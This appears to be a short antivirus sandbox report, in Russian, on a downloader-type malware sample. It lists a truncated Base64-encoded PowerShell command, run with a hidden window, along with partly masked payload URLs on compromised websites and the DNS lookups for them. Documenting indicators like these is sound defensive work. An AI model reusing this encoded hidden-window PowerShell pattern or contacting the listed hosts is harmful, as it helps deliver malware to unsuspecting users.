Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABQAG4AZAB0AHUAYgBhAG4APQAnAFAAcQB4AHUAZwBkAG4AbgBnAG4AYQB0AGoAJwA7ACQAUwBkAGwAZwBpAGgAegBvAGEAbABvAC...
- 'ak#####k.upsi.edu.my':443
- http://st####ts.vlevski.eu/7b13/kx0h2o7b-crm-0175719071/
- http://in######new.redstone.studio/wp-content/fevuakpbd-d8vh3s78g-40073183/
- http://la###.edu.vn/wp-admin/zFpziuyk/
- DNS ASK st####ts.vlevski.eu
- DNS ASK in######new.redstone.studio
- DNS ASK go###nslate.co
- DNS ASK la###.edu.vn
- DNS ASK ak#####k.upsi.edu.my
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABQAG4AZAB0AHUAYgBhAG4APQAnAFAAcQB4AHUAZwBkAG4AbgBnAG4AYQB0AGoAJwA7ACQAUwBkAGwAZwBpAGgAegBvAGEAbABvAC...' (со скрытым окном)